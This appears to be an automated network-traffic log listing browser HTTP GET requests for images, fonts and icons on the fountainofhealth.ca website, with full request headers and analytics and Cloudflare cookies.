Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/0.5962628874685506:1748892536:s7uFNV44_UPqiWGt6NI_R-aJqAg0ni5tg1I2dsZR1CE/94996ae8ea2e4762 HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=0
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: i
